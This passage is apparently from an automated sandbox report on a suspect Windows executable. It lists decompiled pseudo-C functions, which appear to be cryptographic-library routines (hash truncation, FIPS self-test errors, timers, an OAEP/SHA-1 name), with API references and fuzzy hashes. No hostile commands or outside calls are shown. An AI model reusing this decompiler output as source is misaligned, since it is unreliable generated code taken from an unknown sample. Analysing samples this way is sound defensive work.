                    									__eflags =  *((intOrPtr*)(_t113 + 0x14)) - _t104;
                    									if( *((intOrPtr*)(_t113 + 0x14)) >= _t104) {
                    										__eflags = _t104;
                    										if(_t104 != 0) {
                    											goto L19;
                    										} else {
                    											 *(_t113 + 0x10) = _t104;
                    											__eflags =  *((intOrPtr*)(_t113 + 0x14)) - 0x10;
                    											if( *((intOrPtr*)(_t113 + 0x14)) < 0x10) {
                    												_t70 = _t113;
                    												 *_t70 = 0;
                    												return _t70;
                    											} else {
                    												 *((char*)( *_t113)) = 0;
                    												return _t113;
                    											}
                    										}
                    									} else {
                    										_push(_t90);
                    										_push(_t104);
                    										E013C5927(_t80, _t113);
                    										_t100 = _v4;
                    										__eflags = _t104;
                    										if(_t104 == 0) {
                    											goto L39;
                    										} else {
                    											L19:
                    											_t56 =  *((intOrPtr*)(_t113 + 0x14));
                    											__eflags = _t56 - 0x10;
                    											if(_t56 < 0x10) {
                    												_a12 = _t113;
                    											} else {
                    												_a12 =  *_t113;
                    											}
                    											__eflags = _t56 - 0x10;
                    											if(_t56 < 0x10) {
                    												_t95 = _t113;
                    											} else {
                    												_t95 =  *_t113;
                    											}
                    											_t58 =  *(_t113 + 0x10) - _t100;
                    											__eflags = _t58;
                    											if(_t58 != 0) {
                    												__eflags = _t95 + _t100 + _t121;
                    												E013F47C0(_t95 + _t100 + _t121, _a12 + _t100, _t58);
                    												_t100 = _a4;
                    												_t128 = _t128 + 0xc;
                    											}
                    											__eflags =  *((intOrPtr*)(_t113 + 0x14)) - 0x10;
                    											if( *((intOrPtr*)(_t113 + 0x14)) < 0x10) {
                    												_t59 = _t113;
                    											} else {
                    												_t59 =  *_t113;
                    											}
                    											__eflags = _t121;
                    											if(_t121 != 0) {
                    												__eflags = _t59 + _t100;
                    												E013F5310(_t59 + _t100, _t80, _t121);
                    											}
                    											__eflags =  *((intOrPtr*)(_t113 + 0x14)) - 0x10;
                    											 *(_t113 + 0x10) = _t104;
                    											if( *((intOrPtr*)(_t113 + 0x14)) < 0x10) {
                    												 *((char*)(_t113 + _t104)) = 0;
                    												goto L39;
                    											} else {
                    												 *((char*)( *_t113 + _t104)) = 0;
                    												return _t113;
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t98 =  *((intOrPtr*)(__ecx + 0x14));
                    					if(_t98 < 0x10) {
                    						_t74 = __ecx;
                    					} else {
                    						_t74 =  *__ecx;
                    					}
                    					if(_t80 < _t74) {
                    						goto L13;
                    					} else {
                    						if(_t98 < 0x10) {
                    							_t103 = _t113;
                    						} else {
                    							_t103 =  *_t113;
                    						}
                    						if( *(_t113 + 0x10) + _t103 <= _t80) {
                    							goto L13;
                    						} else {
                    							if(_t98 < 0x10) {
                    								_t77 = _t113;
                    							} else {
                    								_t77 =  *_t113;
                    							}
                    							_push(_a12);
                    							return E013C6F9C(_t80 - _t77, _t113, _t104, _t113, _a4, _t113, _t80 - _t77);
                    						}
                    					}
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: invalid string position$string too long
                    • API String ID: 0-4289949731
                    • Opcode ID: 2aa4162c803dae5b93ee5b3e7725d3b673ddd2e313bc955a981580dabdfa1686
                    • Instruction ID: 2423882537f96d2b4ab00194b02cd77c38db96bf4c3db0d0508994efe2fee07f
                    • Opcode Fuzzy Hash: 2aa4162c803dae5b93ee5b3e7725d3b673ddd2e313bc955a981580dabdfa1686
                    • Instruction Fuzzy Hash: CA41B3353143458BD324DE9CD88092BFBEAEB91E28B24493EF29587A41DB71EC45C7E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E013CF1A0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				intOrPtr _v64;
                    				char _v68;
                    				char _v84;
                    				intOrPtr _v136;
                    				char _v140;
                    				signed int _v152;
                    				signed int _t41;
                    				signed int _t42;
                    				signed char _t54;
                    				intOrPtr _t59;
                    				intOrPtr _t61;
                    				void* _t62;
                    				intOrPtr* _t65;
                    				char* _t71;
                    				intOrPtr* _t84;
                    				char* _t85;
                    				intOrPtr* _t89;
                    				intOrPtr* _t90;
                    				signed int _t96;
                    
                    				_t94 = _t96;
                    				_push(0xffffffff);
                    				_push(E01416A70);
                    				_push( *[fs:0x0]);
                    				_t41 =  *0x1435234; // 0x78d9f939
                    				_t42 = _t41 ^ _t96;
                    				_v20 = _t42;
                    				_push(_t42);
                    				 *[fs:0x0] =  &_v16;
                    				_t84 = __ecx;
                    				_t65 = __ecx + 0x20;
                    				_t82 = _a4;
                    				_push(_t65);
                    				_push(__ecx + 0x1c);
                    				_t89 = __ecx + 0x18;
                    				_push(_t89);
                    				_push(_a4);
                    				 *((intOrPtr*)( *__ecx + 0xcc))();
                    				_t46 =  *_t89;
                    				if( *_t89 == 0xffffffff ||  *((intOrPtr*)(__ecx + 0x1c)) < 1 ||  *_t65 == 0xffffffff) {
                    					_v64 = 0xf;
                    					_v68 = 0;
                    					_v84 = 0;
                    					E013C64B7( &_v84, __eflags, "FilterWithBufferedInput: invalid buffer size", 0x2c);
                    					asm("xorps xmm0, xmm0");
                    					_v8 = 0;
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 1;
                    					_t71 =  &_v44;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3(_t71, _t82,  &_v84, 0, 0xffffffff);
                    					_v8 = 0;
                    					_v60 = 0x141a97c;
                    					E013F4EC6( &_v60, 0x1430adc);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_t90 = _v140;
                    					_t85 = _t71;
                    					_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t90 + 4))))("PutMessage", 0x1435f5c,  &_v140, _t84, _t89);
                    					asm("sbb al, al");
                    					 *(_t85 + 0x30) =  ~_t54 & _v152;
                    					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t90 + 4))))("TruncatedDigestSize", 0x1435f50,  &_v152);
                    					__eflags = _t59;
                    					if(_t59 == 0) {
                    						L6:
                    						_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x2c)))) + 0x1c))();
                    					} else {
                    						_t61 = _v136;
                    						__eflags = _t61;
                    						if(_t61 < 0) {
                    							goto L6;
                    						}
                    					}
                    					 *((intOrPtr*)(_t85 + 0x34)) = _t61;
                    					return _t61;
                    				} else {
                    					_t62 = E013CFB50(__ecx + 0x28, 1, _t46);
                    					 *((char*)(__ecx + 0x24)) = 0;
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t62, _v20 ^ _t94);
                    				}
                    			}

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CF29E
                    Strings
                    • TruncatedDigestSize, xrefs: 013CF2E9
                    • PutMessage, xrefs: 013CF2C6
                    • FilterWithBufferedInput: invalid buffer size, xrefs: 013CF228
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: FilterWithBufferedInput: invalid buffer size$PutMessage$TruncatedDigestSize
                    • API String ID: 2005118841-3547780871
                    • Opcode ID: 5a338e0246a842d1ae24edc091e457c842dd5b616603ca3d2122e17828e9fbe2
                    • Instruction ID: 97e55122a71873a160780f4a4705824097ffdc75efe50c7098d3784b6d77ddae
                    • Opcode Fuzzy Hash: 5a338e0246a842d1ae24edc091e457c842dd5b616603ca3d2122e17828e9fbe2
                    • Instruction Fuzzy Hash: E541B075A04249AFDB14CFA8D894FDEBBB9FF59724F10421EE415A7790C770A908CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E01403602(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				void* _v12;
                    				char _v16;
                    				intOrPtr* _t36;
                    				struct HINSTANCE__* _t37;
                    				struct HINSTANCE__* _t43;
                    				intOrPtr* _t44;
                    				intOrPtr* _t45;
                    				CHAR* _t49;
                    				struct HINSTANCE__* _t50;
                    				void* _t52;
                    				struct HINSTANCE__* _t55;
                    				intOrPtr* _t59;
                    				struct HINSTANCE__* _t64;
                    				intOrPtr _t65;
                    
                    				_t52 = __ecx;
                    				if(_a4 == 2 || _a4 == 1) {
                    					E0140D0F6(_t52);
                    					GetModuleFileNameA(0, 0x143a508, 0x104);
                    					_t49 =  *0x143a64c; // 0xae3390
                    					 *0x143a654 = 0x143a508;
                    					if(_t49 == 0 ||  *_t49 == 0) {
                    						_t49 = 0x143a508;
                    					}
                    					_v8 = 0;
                    					_v16 = 0;
                    					E01403726(_t52, _t49, 0, 0,  &_v8,  &_v16);
                    					_t64 = E0140389B(_v8, _v16, 1);
                    					if(_t64 != 0) {
                    						E01403726(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                    						if(_a4 != 1) {
                    							_v12 = 0;
                    							_push( &_v12);
                    							_t50 = E0140CC11(_t64);
                    							if(_t50 == 0) {
                    								_t59 = _v12;
                    								_t55 = 0;
                    								_t36 = _t59;
                    								if( *_t59 == 0) {
                    									L15:
                    									_t37 = 0;
                    									 *0x143a640 = _t55;
                    									_v12 = 0;
                    									_t50 = 0;
                    									 *0x143a644 = _t59;
                    									L16:
                    									E014012E1(_t37);
                    									_v12 = 0;
                    									goto L17;
                    								} else {
                    									goto L14;
                    								}
                    								do {
                    									L14:
                    									_t36 = _t36 + 4;
                    									_t55 =  &(_t55->i);
                    								} while ( *_t36 != 0);
                    								goto L15;
                    							}
                    							_t37 = _v12;
                    							goto L16;
                    						}
                    						 *0x143a640 = _v8 - 1;
                    						_t43 = _t64;
                    						_t64 = 0;
                    						 *0x143a644 = _t43;
                    						goto L10;
                    					} else {
                    						_t44 = E013FDB3A();
                    						_push(0xc);
                    						_pop(0);
                    						 *_t44 = 0;
                    						L10:
                    						_t50 = 0;
                    						L17:
                    						E014012E1(_t64);
                    						return _t50;
                    					}
                    				} else {
                    					_t45 = E013FDB3A();
                    					_t65 = 0x16;
                    					 *_t45 = _t65;
                    					E013FDA61();
                    					return _t65;
                    				}
                    			}

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\6hFKK8UQi7.exe,00000104), ref: 01403642
                    • _free.LIBCMT ref: 0140370D
                    • _free.LIBCMT ref: 01403717
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Users\user\Desktop\6hFKK8UQi7.exe
                    • API String ID: 2506810119-3980468673
                    • Opcode ID: 39e2024f4f8028d6e46c8afc35a8e4897423c1441d41f89fe6d8d030cdd024b2
                    • Instruction ID: 4bf8b0e8e55437da76c19cb3252087d71cc61e6505688a45c9e29a52cf878a4e
                    • Opcode Fuzzy Hash: 39e2024f4f8028d6e46c8afc35a8e4897423c1441d41f89fe6d8d030cdd024b2
                    • Instruction Fuzzy Hash: 9F3165B1904215EFDB32DF9ADC8499EBFE8FBA5710F20407BE94897360D6708A419B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E013CD180(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				char _v84;
                    				char _v108;
                    				char _v132;
                    				char _v156;
                    				char _v180;
                    				char _v204;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t30;
                    				signed int _t31;
                    				void* _t37;
                    				void* _t42;
                    				void* _t44;
                    				void* _t46;
                    				void* _t48;
                    				intOrPtr* _t61;
                    				signed int _t67;
                    
                    				_push(0xffffffff);
                    				_push(E01416891);
                    				_push( *[fs:0x0]);
                    				_t30 =  *0x1435234; // 0x78d9f939
                    				_t31 = _t30 ^ _t67;
                    				_v20 = _t31;
                    				_push(_t31);
                    				 *[fs:0x0] =  &_v16;
                    				_t61 = __ecx;
                    				_t64 = _a4;
                    				if(_a4 >  *((intOrPtr*)( *__ecx + 0x1c))()) {
                    					_t37 = E013E9DA0( &_v84, _t64, 0xa);
                    					_t59 =  *_t61;
                    					_v8 = 0;
                    					_push(E013E9DA0( &_v108,  *((intOrPtr*)( *_t61 + 0x1c))(), 0xa));
                    					_v8 = 1;
                    					_t42 = E013CAD00(_t61,  &_v132, "HashTransformation: can\'t truncate a ");
                    					_v8 = 2;
                    					_t44 = E013C1DF7(__ebx, _t61,  *_t61,  &_v156, _t42, " byte digest to ");
                    					_v8 = 3;
                    					_t46 = E013C1DA9(__ebx, _t61, _t61,  &_v180, _t44, _t37);
                    					_v8 = 4;
                    					_t48 = E013C1DF7(__ebx, _t61,  *_t61,  &_v204, _t46, " bytes");
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 6;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44, _t59, _t48, 0, 0xffffffff);
                    					_v8 = 5;
                    					_v60 = 0x141a97c;
                    					_t34 = E013F4EC6( &_v60, 0x1430adc);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t34, _v20 ^ _t67);
                    			}

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CD28B
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrow
                    • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                    • API String ID: 3976011213-1139078987
                    • Opcode ID: 946b0524c116691909c87279aa37ca4b05f80c015998b7ed0a5f73a8e80e611f
                    • Instruction ID: 530494d48f87d4d2335150f295bc45f1557350cc34e7c8939d214385acb8bdcb
                    • Opcode Fuzzy Hash: 946b0524c116691909c87279aa37ca4b05f80c015998b7ed0a5f73a8e80e611f
                    • Instruction Fuzzy Hash: 0631C271D00359EADB11DBA8CC48FDFBBB8AF15728F20425AE404B7380DBB55A448BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E013CB0B0(void* __ecx, char _a4) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v44;
                    				char _v68;
                    				char _v108;
                    				char _v148;
                    				void* __ebp;
                    				signed int _t17;
                    				signed int _t18;
                    				void* _t46;
                    				signed int _t48;
                    
                    				_push(0xffffffff);
                    				_push(E01416300);
                    				_push( *[fs:0x0]);
                    				_t17 =  *0x1435234; // 0x78d9f939
                    				_t18 = _t17 ^ _t48;
                    				_v20 = _t18;
                    				_push(_t18);
                    				 *[fs:0x0] =  &_v16;
                    				_t46 = __ecx;
                    				if(_a4 != 0 && E013C4DA0() != 0) {
                    					if(E013ED600() == 0 && E013C4DA0() == 0) {
                    						E013C2AD0( &_v44, "Cryptographic algorithms are disabled before the power-up self tests are performed.");
                    						_v8 = 0;
                    						E013CB650( &_v44);
                    						E013F4EC6( &_v108, 0x1431588);
                    					}
                    					if(E013ED600() == 1) {
                    						E013C2AD0( &_v68, "Cryptographic algorithms are disabled after a power-up self test failed.");
                    						_v8 = 1;
                    						E013CB650( &_v68);
                    						E013F4EC6( &_v148, 0x1431588);
                    					}
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t46, _v20 ^ _t48);
                    			}

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CB12C
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CB16A
                    Strings
                    • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 013CB103
                    • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 013CB13B
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                    • API String ID: 3476068407-3345525433
                    • Opcode ID: e811a2525d444ed7a7c79e5ea2ad78cc58e66bb71d73f3306e66e19d14e8abd5
                    • Instruction ID: a657dc11dc4f3000881b32092d26f357e682760287bfe61bc54436052e8ca0af
                    • Opcode Fuzzy Hash: e811a2525d444ed7a7c79e5ea2ad78cc58e66bb71d73f3306e66e19d14e8abd5
                    • Instruction Fuzzy Hash: 9A2193719102199ADF21EFACCD45BDEF7BCEF14A68F40056EE906A3294EF70A904CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E013EA7A0(void* __edx, void* __edi) {
                    				struct %anon52 _v8;
                    				char _v16;
                    				signed int _v20;
                    				struct %anon52 _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				char _v84;
                    				struct %anon52 _v112;
                    				union _LARGE_INTEGER _v116;
                    				void* __ebp;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t34;
                    				void* _t43;
                    				signed int _t46;
                    
                    				_t43 = __edx;
                    				_push(0xffffffff);
                    				_push(E01417DD8);
                    				_push( *[fs:0x0]);
                    				_t23 =  *0x1435234; // 0x78d9f939
                    				_t24 = _t23 ^ _t46;
                    				_v20 = _t24;
                    				_push(_t24);
                    				 *[fs:0x0] =  &_v16;
                    				_v116.LowPart = 0;
                    				_v112 = 0;
                    				if(QueryPerformanceCounter( &_v116) == 0) {
                    					_push(E013E9DA0( &_v84, GetLastError(), 0xa));
                    					_v8.LowPart = 0;
                    					_t34 = E013CAD00(__edi,  &(_v112.HighPart), "Timer: QueryPerformanceCounter failed with error ");
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8.LowPart = 2;
                    					_v60 = 0x141a7b8;
                    					_v48 = 6;
                    					_v28.HighPart = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44, _t43, _t34, 0, 0xffffffff);
                    					_v8 = 1;
                    					E013F4EC6( &_v60, 0x14327ec);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_v116.LowPart, _v20 ^ _t46);
                    			}

                    APIs
                    • QueryPerformanceCounter.KERNEL32(?), ref: 013EA7DA
                    • GetLastError.KERNEL32(0000000A), ref: 013EA7E6
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA855
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Timer: QueryPerformanceCounter failed with error , xrefs: 013EA801
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrow
                    • String ID: Timer: QueryPerformanceCounter failed with error
                    • API String ID: 3328791911-4075696077
                    • Opcode ID: ec37ffc3ae13ee7c91d8af8e720d903c752a5f33e782a3c5a75aa6c970bed239
                    • Instruction ID: 49bbac1f06d5919b389bf333802c3d64282f6f33f7d41b45f1cb58773a0508ea
                    • Opcode Fuzzy Hash: ec37ffc3ae13ee7c91d8af8e720d903c752a5f33e782a3c5a75aa6c970bed239
                    • Instruction Fuzzy Hash: 7C2149B1D04349EBDB11DFA4C949BDEBBB8AB19718F20421AE815B7281DBB856048B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E013EA880(void* __edx, void* __edi) {
                    				struct %anon52 _v8;
                    				char _v16;
                    				signed int _v20;
                    				struct %anon52 _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				char _v84;
                    				struct %anon52 _v112;
                    				union _LARGE_INTEGER _v116;
                    				void* __ebp;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t34;
                    				void* _t43;
                    				signed int _t46;
                    
                    				_t43 = __edx;
                    				_push(0xffffffff);
                    				_push(E01417DD8);
                    				_push( *[fs:0x0]);
                    				_t23 =  *0x1435234; // 0x78d9f939
                    				_t24 = _t23 ^ _t46;
                    				_v20 = _t24;
                    				_push(_t24);
                    				 *[fs:0x0] =  &_v16;
                    				_v116.LowPart = 0;
                    				_v112 = 0;
                    				if(QueryPerformanceFrequency( &_v116) == 0) {
                    					_push(E013E9DA0( &_v84, GetLastError(), 0xa));
                    					_v8.LowPart = 0;
                    					_t34 = E013CAD00(__edi,  &(_v112.HighPart), "Timer: QueryPerformanceFrequency failed with error ");
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8.LowPart = 2;
                    					_v60 = 0x141a7b8;
                    					_v48 = 6;
                    					_v28.HighPart = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44, _t43, _t34, 0, 0xffffffff);
                    					_v8 = 1;
                    					E013F4EC6( &_v60, 0x14327ec);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_v116.LowPart, _v20 ^ _t46);
                    			}

                    APIs
                    • QueryPerformanceFrequency.KERNEL32(?), ref: 013EA8BA
                    • GetLastError.KERNEL32(0000000A), ref: 013EA8C6
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA935
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Timer: QueryPerformanceFrequency failed with error , xrefs: 013EA8E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrow
                    • String ID: Timer: QueryPerformanceFrequency failed with error
                    • API String ID: 1209282935-348333943
                    • Opcode ID: a890b17f7fa56c077c447d050d0461077730994da62fa090f19e35e5a5764377
                    • Instruction ID: 30e13e12522248e84a36e9e2504fd4176712590ca333963be06770553b6d6956
                    • Opcode Fuzzy Hash: a890b17f7fa56c077c447d050d0461077730994da62fa090f19e35e5a5764377
                    • Instruction Fuzzy Hash: 36218BB1D0434DEBCB11DFE4C848BDEBBB8BB19718F20421AE415B7280DBB466048B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E013C554F(void* __ebx, void* __edx) {
                    				void* _t18;
                    				void* _t20;
                    				void* _t22;
                    				void* _t24;
                    				void* _t38;
                    				void* _t40;
                    
                    				_t38 = __edx;
                    				_t32 = __ebx;
                    				_push(0x64);
                    				E013F26C2(E01415BC4);
                    				_t33 = _t40 - 0x70;
                    				 *((intOrPtr*)(_t40 - 0x10)) = 0;
                    				_t18 = E013C2AD0(_t40 - 0x70, "OAEP-");
                    				 *((intOrPtr*)(_t40 - 4)) = 0;
                    				_t20 = E013C1DF7(__ebx, _t40 - 0x70, _t38, _t40 - 0x58, _t18, "MGF1");
                    				 *((char*)(_t40 - 4)) = 1;
                    				_t22 = E013C1DF7(__ebx, _t33, _t38, _t40 - 0x40, _t20, "(");
                    				 *((char*)(_t40 - 4)) = 2;
                    				_t24 = E013C1DF7(_t32, _t33, _t38, _t40 - 0x28, _t22, "SHA-1");
                    				 *((char*)(_t40 - 4)) = 3;
                    				E013C1DF7(_t32, _t33, _t38,  *((intOrPtr*)(_t40 + 8)), _t24, ")");
                    				E013C6118(_t40 - 0x28, 1, 0);
                    				E013C6118(_t40 - 0x40, 1, 0);
                    				E013C6118(_t40 - 0x58, 1, 0);
                    				E013C6118(_t40 - 0x70, 1, 0);
                    				return E013F269C( *((intOrPtr*)(_t40 + 8)));
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3
                    • String ID: MGF1$OAEP-$SHA-1
